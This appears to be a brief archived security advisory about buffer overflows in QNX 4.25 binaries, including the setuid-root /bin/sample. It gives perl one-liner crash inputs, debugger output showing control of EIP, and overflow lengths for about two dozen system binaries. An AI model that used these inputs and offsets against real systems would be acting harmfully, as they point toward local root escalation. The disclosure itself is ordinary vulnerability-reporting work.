|
COMMAND QnX multiples bof in suid/no suid files SYSTEMS AFFECTED QnX OS 4.25 PROBLEM Egor Egorov founds the following binaries to be vulnerable to buffer overflows : /bin/sample Example : ========= # cd /bin # ls -l sample -rwsrwxr-x 1 root root 20639 Jan 19 1996 sample # sample `perl -e \'print \"A\" x 280\'` Profile based upon 2000 samples/second. //1/bin/sample terminated (SIGSEGV) at 0005:00000041 %1 672 Memory fault sample $(perl -e \'print \"A\" x 280\') # wd sample \'perl -e print \"A\" x 280\'` ebp: 41414141 eip: 00000041 # wd sample \'perl -e \'print \"A\" x 280, \"B\"\'` ebp: 41414141 eip: 00004241 /bin/ex Example : ========= # wd ex `perl -e \'print \"AAA\" x 420, \"good\", \"CCC\" x 280\'` ebp: 00000041 eip: 646f6f67 - doog And also : file bytes for bof /bin/du - 558 /bin/find - 799 /bin/lex - 1673 /bin/mkdir - 517 /bin/rm - 351 /bin/serserv - 224 /bin/tcpserv - 146 /bin/termdef - 729 /bin/time - 2489 /bin/unzip - 299 /bin/use - 1964 /bin/wcc - 138 /bin/wcc386 - 137 /bin/wd - /bin/wdisasm - 135 /bin/which - 304 /bin/wlib - 256 /bin/wlink - 10244 /bin/wpp - 256 /bin/wpp386 - 256 /bin/wprof - 141 /bin/write - 157 /bin/wstrip - 817 SOLUTION Update ?